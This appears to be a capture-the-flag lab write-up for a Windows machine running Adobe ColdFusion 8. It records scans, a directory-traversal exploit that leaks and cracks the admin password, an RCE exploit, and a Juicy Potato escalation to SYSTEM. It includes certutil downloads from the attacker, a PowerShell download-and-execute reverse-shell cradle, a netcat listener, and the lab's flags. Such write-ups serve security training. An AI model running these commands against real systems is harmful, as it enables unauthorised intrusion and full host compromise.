nmap -T4 -p- -A -Pn -v
nmap -Pn --script vuln
python2 14641.py 8500 ../../../../../../../lib/password.properties
#use cfide exploit
#this gives us the password for admin login
#edit the params in RCE script
python3 50057.py
#gives us shell
whoami /priv
#SeImpersonatePrivilege enabled
#we can use Juicy Potato attack
#in attacker machine
python3 -m http.server
#in victim machine
cd C:\Users\tolis\Desktop
certutil -urlcache -f jp.exe
#in attacker machine
#append reverse-shell line to script
vim Invoke-PowerShellTcp.ps1
echo "powershell -c iex(new-object net.webclient).downloadstring('')" > shell.bat
nc -nvlp 6666
#in victim machine
certutil -urlcache -f shell.bat
.\jp.exe -t * -p shell.bat -l 4444
#this gives us shell as System on our listener (port 6666)
Open ports & services:
- 135 - msrpc
- 8500 - fmtp
- 49154 - msrpc
We can attempt to interact with the service on port 8500; we can check it via browser as well.
Visiting gives us two directories - /CFIDE and /cfdocs - and these contain more files within.
Googling 'CFIDE exploit' gives us a few results for Adobe ColdFusion directory traversal exploits.
We can try running the directory traversal exploit; the Python script includes the example to print a password file - we can use that.
Running the exploit gives us an 'encrypted' credential - the MD5 hash can be cracked using online services to give us plaintext 'happyday'.
Now, looking for login pages in /CFIDE, we get /CFIDE/administrator, which is the login page for user 'admin'.
Using the previously found cred, we are able to log into as admin; this is the admin page for ColdFusion 8.
We can search for ways to get reverse shell via ColdFusion admin page - we get an exploit from Exploit-DB which allows us to get RCE.
After changing the required parameters in the Python script for ColdFusion RCE, running the exploit gives us a shell on the Windows machine as 'tolis'.
Checking the privileges shows us that we have SeImpersonatePrivilege enabled; we can run Juicy Potato attack to get System.
After downloading the .exe for JuicyPotato, we can prepare our reverse-shell using Invoke-PowerShellTcp.ps1 script.
Setting up a listener on attacker machine, and running the required .bat file with Juicy Potato gives us reverse shell as System user.
1. User flag - 2c9d9b6175005d17d93a42448d89ca64
2. Root flag - 879caae525f76486d79df60be496430d